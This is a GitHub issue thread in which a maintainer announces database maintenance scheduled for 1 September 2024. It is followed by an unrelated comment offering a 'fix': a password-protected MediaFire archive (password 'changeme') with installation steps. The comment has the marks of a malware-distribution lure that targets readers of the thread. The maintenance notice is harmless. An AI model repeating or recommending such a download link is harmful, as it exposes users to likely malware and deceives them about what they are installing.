### ISSUE TITLE
Scheduled DB maintenance on 1 Sep 2024

### ISSUE THREAD

**Issue by vishnu-narayanan** [chatwoot/status#137]
Dear Customer,

Due to scheduled database maintenance, our services will be temporarily unavailable on Sunday, September 1st, 2024, from 2:30 AM to 5:30 AM UTC.

We apologize for any inconvenience and appreciate your understanding.

**Comment by li371359001** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
